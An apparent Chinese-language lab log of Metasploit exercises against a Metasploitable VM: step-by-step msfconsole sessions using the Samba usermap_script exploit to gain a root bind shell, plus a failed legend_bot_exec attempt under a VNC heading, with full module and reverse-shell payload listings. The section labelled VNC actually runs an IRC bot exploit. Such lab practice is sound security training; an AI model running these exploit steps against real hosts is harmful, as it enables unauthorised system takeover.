1 . 使用 msf 图形化工具 armitage
从 armitage 菜单项中选择 exploits --> multi --> samba --> usermap_script
将显示对话渗透攻击模块进行参数配置的对话框,填写 RHOST 即可开始
完成后可以输入 uname -a 或者 whoami 进行检验
2 . 使用 msfconsole 控制台利用 samba 漏洞获取控制权
root@kali:~# msfconsole
msf > help search
Usage: search [keywords]
Keywords:
app : Modules that are client or server attacks
author : Modules written by this author
bid : Modules with a matching Bugtraq ID
cve : Modules with a matching CVE ID
edb : Modules with a matching Exploit-DB ID
name : Modules with a matching descriptive name
platform : Modules affecting this platform
ref : Modules with a matching ref
type : Modules of a specific type (exploit, auxiliary, or post)
Examples:
search cve:2009 type:exploit app:client
msf > search samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
auxiliary/scanner/rsync/modules_list normal List Rsync Modules
auxiliary/scanner/smb/smb_uninit_cred normal Samba _netr_ServerPasswordSet Uninitialized Credential State
exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution
exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent MS14-060 Microsoft Windows OLE Package Manager Code Execution
exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow
exploit/windows/smb/group_policy_startup 2015-01-26 manual Group Policy Script Execution From Shared Resource
post/linux/gather/enum_configs normal Linux Gather Configurations
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh)
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/bind_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(usermap_script) >
msf exploit(usermap_script) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (172.16.0.132:32807 -> 172.16.0.135:4444) at 2017-08-16 08:27:37 -0400
uname -a
Linux www.metasploitable.tst 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
3 . 使用 msfconsole 控制台利用 VNC 漏洞获取控制权
msf > search vnc
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/vnc/realvnc_41_bypass 2006-05-15 normal RealVNC NULL Authentication Mode Bypass
auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner
auxiliary/scanner/vnc/vnc_none_auth normal VNC Authentication None Detection
auxiliary/server/capture/vnc normal Authentication Capture: VNC
exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Legend Perl IRC Bot Remote Code Execution
exploit/multi/vnc/vnc_keyboard_exec 2015-07-10 great VNC Keyboard Remote Code Execution
exploit/windows/vnc/realvnc_client 2001-01-29 normal RealVNC 3.3.7 Client Buffer Overflow
exploit/windows/vnc/ultravnc_client 2006-04-04 normal UltraVNC 1.0.1 Client Buffer Overflow
exploit/windows/vnc/ultravnc_viewer_bof 2008-02-06 normal UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
exploit/windows/vnc/winvnc_http_get 2001-01-29 average WinVNC Web Server GET Overflow
payload/windows/vncinject/bind_hidden_ipknock_tcp normal VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
payload/windows/vncinject/bind_hidden_tcp normal VNC Server (Reflective Injection), Hidden Bind TCP Stager
payload/windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
payload/windows/vncinject/bind_ipv6_tcp_uuid normal VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
payload/windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
payload/windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
payload/windows/vncinject/bind_tcp_rc4 normal VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
payload/windows/vncinject/bind_tcp_uuid normal VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
payload/windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager
payload/windows/vncinject/reverse_hop_http normal VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
payload/windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
payload/windows/vncinject/reverse_http_proxy_pstore normal VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
payload/windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
payload/windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
payload/windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
payload/windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
payload/windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
payload/windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
payload/windows/vncinject/reverse_tcp_rc4 normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
payload/windows/vncinject/reverse_tcp_rc4_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
payload/windows/vncinject/reverse_tcp_uuid normal VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
payload/windows/vncinject/reverse_winhttp normal VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
payload/windows/x64/vncinject/bind_ipv6_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
payload/windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
payload/windows/x64/vncinject/bind_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
payload/windows/x64/vncinject/reverse_http normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
payload/windows/x64/vncinject/reverse_https normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
payload/windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
payload/windows/x64/vncinject/reverse_tcp_uuid normal Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
payload/windows/x64/vncinject/reverse_winhttp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
payload/windows/x64/vncinject/reverse_winhttps normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
post/multi/gather/remmina_creds normal UNIX Gather Remmina Credentials
post/osx/gather/enum_chicken_vnc_profile normal OS X Gather Chicken of the VNC Profile
post/windows/gather/credentials/mremote normal Windows Gather mRemote Saved Password Extraction
post/windows/gather/credentials/vnc normal Windows Gather VNC Password Extraction
msf > use multi/misc/legend_bot_exec
msf exploit(legend_bot_exec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh)
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)
cmd/windows/adduser normal Windows Execute net user /ADD CMD
cmd/windows/bind_lua normal Windows Command Shell, Bind TCP (via Lua)
cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via Perl)
cmd/windows/bind_perl_ipv6 normal Windows Command Shell, Bind TCP (via perl) IPv6
cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby)
cmd/windows/download_eval_vbs normal Windows Executable Download and Evaluate VBS
cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs)
cmd/windows/generic normal Windows Command, Generic Command Execution
cmd/windows/reverse_lua normal Windows Command Shell, Reverse TCP (via Lua)
cmd/windows/reverse_perl normal Windows Command, Double Reverse TCP Connection (via Perl)
cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby)
msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk
payloads => cmd/unix/bind_awk
msf exploit(legend_bot_exec) > show options
Module options (exploit/multi/misc/legend_bot_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CHANNEL #channel yes IRC Channel
IRC_PASSWORD no IRC Connection Password
NICK msf_user yes IRC Nickname
RHOST yes The target address
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Legend IRC Bot
msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(legend_bot_exec) > exploit
[*] Started reverse TCP double handler on 172.16.0.132:4444
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Registering with the IRC Server...
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Joining the #channel channel...
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Exploiting the malicious IRC bot...
[*] Exploit completed, but no session was created.
实验未成功
4 . 总结过程
以 VNC 为例:
msf > search vnc
msf > use multi/misc/legend_bot_exec
msf exploit(legend_bot_exec) > show payloads
msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk
payloads => cmd/unix/bind_awk
msf exploit(legend_bot_exec) > show options
msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(legend_bot_exec) > exploit